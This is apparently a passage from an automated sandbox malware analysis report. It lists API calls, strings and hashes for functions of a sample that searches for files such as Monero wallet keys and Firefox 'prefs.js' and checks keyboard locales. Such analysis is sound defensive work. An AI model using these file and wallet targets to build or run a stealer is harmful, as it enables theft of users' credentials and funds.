                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00FF406C
                                    • FindClose.KERNEL32(000000FF), ref: 00FF4081
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseFirstNextwsprintf
                                    • String ID: %s\%s
                                    • API String ID: 180737720-4073750446
                                    • Opcode ID: 639650343d233343ed03a0a8b0b2263252da345c1adef5cff5830e068980c417
                                    • Instruction ID: 879585b501ff21cdc68b378a188a4665152c4e009c2210f86ed43f218ce31ee2
                                    • Opcode Fuzzy Hash: 639650343d233343ed03a0a8b0b2263252da345c1adef5cff5830e068980c417
                                    • Instruction Fuzzy Hash: D9510FB6900218ABCB34EFA0DC89EFE7378BF44700F404588F75996454DBB5AB859FA1
                                    Function 00FEED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • wsprintfA.USER32 ref: 00FEED3E
                                    • FindFirstFileA.KERNEL32(?,?), ref: 00FEED55
                                    • StrCmpCA.SHLWAPI(?,01001538), ref: 00FEEDAB
                                    • StrCmpCA.SHLWAPI(?,0100153C), ref: 00FEEDC1
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00FEF2AE
                                    • FindClose.KERNEL32(000000FF), ref: 00FEF2C3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseFirstNextwsprintf
                                    • String ID: %s\*.*
                                    • API String ID: 180737720-1013718255
                                    • Opcode ID: f79e66592a457bcc6ad6845718874da4f70d4d32683303741d950e2d9486bf51
                                    • Instruction ID: ece5a5533fec84c4b25ef4689b2e9f4bc3b4a6019e18b8733c9c38402f9ed5f2
                                    • Opcode Fuzzy Hash: f79e66592a457bcc6ad6845718874da4f70d4d32683303741d950e2d9486bf51
                                    • Instruction Fuzzy Hash: FBE103B291111C9AEB24FB60DC51EFE7338AF54340F4041E9B60E660A6EF746B8ADF51
                                    Function 00FEF6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00FFA740: lstrcpy.KERNEL32(01000E17,00000000), ref: 00FFA788
                                      • Part of subcall function 00FFA920: lstrcpy.KERNEL32(00000000,?), ref: 00FFA972
                                      • Part of subcall function 00FFA920: lstrcat.KERNEL32(00000000), ref: 00FFA982
                                      • Part of subcall function 00FFA9B0: lstrlen.KERNEL32(?,01809130,?,\Monero\wallet.keys,01000E17), ref: 00FFA9C5
                                      • Part of subcall function 00FFA9B0: lstrcpy.KERNEL32(00000000), ref: 00FFAA04
                                      • Part of subcall function 00FFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FFAA12
                                      • Part of subcall function 00FFA8A0: lstrcpy.KERNEL32(?,01000E17), ref: 00FFA905
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,010015B8,01000D96), ref: 00FEF71E
                                    • StrCmpCA.SHLWAPI(?,010015BC), ref: 00FEF76F
                                    • StrCmpCA.SHLWAPI(?,010015C0), ref: 00FEF785
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00FEFAB1
                                    • FindClose.KERNEL32(000000FF), ref: 00FEFAC3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                    • String ID: prefs.js
                                    • API String ID: 3334442632-3783873740
                                    • Opcode ID: a90775db2c3edaf5d984b1529b1d26cb9f5f8db92f4f5ad1b49a90ebada0abd4
                                    • Instruction ID: de04804e1316a5151ef40f5673ea023fd8abd262b3fa0b0c4baaf3f9de302ef8
                                    • Opcode Fuzzy Hash: a90775db2c3edaf5d984b1529b1d26cb9f5f8db92f4f5ad1b49a90ebada0abd4
                                    • Instruction Fuzzy Hash: 8DB122B290010C9BDB24FF60DC95EFD7379AF54300F4085A8A50E9B1A5EF786B49DB92
                                    Function 00FE16D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00FFA740: lstrcpy.KERNEL32(01000E17,00000000), ref: 00FFA788
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0100510C,?,?,?,010051B4,?,?,00000000,?,00000000), ref: 00FE1923
                                    • StrCmpCA.SHLWAPI(?,0100525C), ref: 00FE1973
                                    • StrCmpCA.SHLWAPI(?,01005304), ref: 00FE1989
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00FE1D40
                                    • DeleteFileA.KERNEL32(00000000), ref: 00FE1DCA
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00FE1E20
                                    • FindClose.KERNEL32(000000FF), ref: 00FE1E32
                                      • Part of subcall function 00FFA920: lstrcpy.KERNEL32(00000000,?), ref: 00FFA972
                                      • Part of subcall function 00FFA920: lstrcat.KERNEL32(00000000), ref: 00FFA982
                                      • Part of subcall function 00FFA9B0: lstrlen.KERNEL32(?,01809130,?,\Monero\wallet.keys,01000E17), ref: 00FFA9C5
                                      • Part of subcall function 00FFA9B0: lstrcpy.KERNEL32(00000000), ref: 00FFAA04
                                      • Part of subcall function 00FFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FFAA12
                                      • Part of subcall function 00FFA8A0: lstrcpy.KERNEL32(?,01000E17), ref: 00FFA905
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                    • String ID: \*.*
                                    • API String ID: 1415058207-1173974218
                                    • Opcode ID: 77c3e48ff77b9b2724e7c71e1a71dac2df8a6ec8d4ecaa4650f64227458e84fb
                                    • Instruction ID: 257778fb00b7f30c87c5a06e5958eebe6c1fd2c59ffef3f586bc32c403d102e1
                                    • Opcode Fuzzy Hash: 77c3e48ff77b9b2724e7c71e1a71dac2df8a6ec8d4ecaa4650f64227458e84fb
                                    • Instruction Fuzzy Hash: 821232B191011C9ADB25FB60CC96EFD7378AF14340F4041A9B20E621A5EF786F89DF91
                                    Function 00FEDE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00FFA740: lstrcpy.KERNEL32(01000E17,00000000), ref: 00FFA788
                                      • Part of subcall function 00FFA9B0: lstrlen.KERNEL32(?,01809130,?,\Monero\wallet.keys,01000E17), ref: 00FFA9C5
                                      • Part of subcall function 00FFA9B0: lstrcpy.KERNEL32(00000000), ref: 00FFAA04
                                      • Part of subcall function 00FFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FFAA12
                                      • Part of subcall function 00FFA8A0: lstrcpy.KERNEL32(?,01000E17), ref: 00FFA905
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,01000C2E), ref: 00FEDE5E
                                    • StrCmpCA.SHLWAPI(?,010014C8), ref: 00FEDEAE
                                    • StrCmpCA.SHLWAPI(?,010014CC), ref: 00FEDEC4
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00FEE3E0
                                    • FindClose.KERNEL32(000000FF), ref: 00FEE3F2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                    • String ID: \*.*
                                    • API String ID: 2325840235-1173974218
                                    • Opcode ID: fc9eac6ad9ff922038173e5a18ed0d6708277d8393130c88722c7296e13790c6
                                    • Instruction ID: bdade67d2e30b1ef343c787a8f7663ac6b4f42ad0aa9bb061a0ad42ae74bfb81
                                    • Opcode Fuzzy Hash: fc9eac6ad9ff922038173e5a18ed0d6708277d8393130c88722c7296e13790c6
                                    • Instruction Fuzzy Hash: 24F1AEB181011C9ADB25EB60DC95EFE7338BF14340F4041E9B60E621A5EF786B8ADF61
                                    Function 013AAC7E Relevance: 14.2, Strings: 10, Instructions: 1671COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 2kn,$2Yy$:b]$FRw$Mzyn$P)&$hZc$4j}$o?|$u>
                                    • API String ID: 0-303601043
                                    • Opcode ID: 733ebe35abff2ec5ac96a335acbfb821a2732e7f79bbae1f2c06cbf4cf10becb
                                    • Instruction ID: 5915c04eb996d11b48edafa369c70d08036a5f67d016c27dead2956a35974434
                                    • Opcode Fuzzy Hash: 733ebe35abff2ec5ac96a335acbfb821a2732e7f79bbae1f2c06cbf4cf10becb
                                    • Instruction Fuzzy Hash: 57B208F360C2049FE304AE2DEC9567ABBE9EFD4720F1A493DE6C4C3744EA3558058696
                                    Function 00FEDA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00FFA740: lstrcpy.KERNEL32(01000E17,00000000), ref: 00FFA788
                                      • Part of subcall function 00FFA920: lstrcpy.KERNEL32(00000000,?), ref: 00FFA972
                                      • Part of subcall function 00FFA920: lstrcat.KERNEL32(00000000), ref: 00FFA982
                                      • Part of subcall function 00FFA9B0: lstrlen.KERNEL32(?,01809130,?,\Monero\wallet.keys,01000E17), ref: 00FFA9C5
                                      • Part of subcall function 00FFA9B0: lstrcpy.KERNEL32(00000000), ref: 00FFAA04
                                      • Part of subcall function 00FFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FFAA12
                                      • Part of subcall function 00FFA8A0: lstrcpy.KERNEL32(?,01000E17), ref: 00FFA905
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,010014B0,01000C2A), ref: 00FEDAEB
                                    • StrCmpCA.SHLWAPI(?,010014B4), ref: 00FEDB33
                                    • StrCmpCA.SHLWAPI(?,010014B8), ref: 00FEDB49
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00FEDDCC
                                    • FindClose.KERNEL32(000000FF), ref: 00FEDDDE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                    • String ID:
                                    • API String ID: 3334442632-0
                                    • Opcode ID: de883387bb290b00900f77eaff5f83be718ead63b56bf52ed205bb97d062a95c
                                    • Instruction ID: 8c83c693737ca0153390e7eb9c798d4340969d8305bc14f04f56f46813c36a3e
                                    • Opcode Fuzzy Hash: de883387bb290b00900f77eaff5f83be718ead63b56bf52ed205bb97d062a95c
                                    • Instruction Fuzzy Hash: 5D9165B2900108A7CB24FB71EC56DFD737DAF84340F008568F90A96595EF78AB19DB92
                                    Function 013B675F Relevance: 12.9, Strings: 9, Instructions: 1606COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: Q]W$bG;$hl{$ll{$u;",$wG$/w_$G75$}d_
                                    • API String ID: 0-2888110392
                                    • Opcode ID: d8087104b2b17a6b1d38a476806bd6b2b0081fd6f77270b0c7d00283d243adf8
                                    • Instruction ID: 511d539b261509f29dbd90ad15abf0d9cde7c4d1b9dea9f4e1538ee0b2492188
                                    • Opcode Fuzzy Hash: d8087104b2b17a6b1d38a476806bd6b2b0081fd6f77270b0c7d00283d243adf8
                                    • Instruction Fuzzy Hash: 34B205F360C204AFE3046E2DEC8567ABBE9EF94720F1A4A3DE6C4C7744E63558018697
                                    Function 00FF7B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00FFA740: lstrcpy.KERNEL32(01000E17,00000000), ref: 00FFA788
                                    • GetKeyboardLayoutList.USER32(00000000,00000000,010005AF), ref: 00FF7BE1
                                    • LocalAlloc.KERNEL32(00000040,?), ref: 00FF7BF9
                                    • GetKeyboardLayoutList.USER32(?,00000000), ref: 00FF7C0D
                                    • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00FF7C62
                                    • LocalFree.KERNEL32(00000000), ref: 00FF7D22
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                    • String ID: /
                                    • API String ID: 3090951853-4001269591
                                    • Opcode ID: 994f36868555ca8b9cf0e47dd836b7afbdbed7ef149f7af57efa1206ea053a80
                                    • Instruction ID: 8e4ee2d646920771cee53ec4b9815e9b17f9beef394e0335e7d30e80ff2983ee
                                    • Opcode Fuzzy Hash: 994f36868555ca8b9cf0e47dd836b7afbdbed7ef149f7af57efa1206ea053a80
                                    • Instruction Fuzzy Hash: CD4129B194021CABDB24EB94DC99BFEB374EF44700F204199E209662A0DB742F85DFA1
                                    Function 013BEE9B Relevance: 10.4, Strings: 7, Instructions: 1632COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmpDownload File
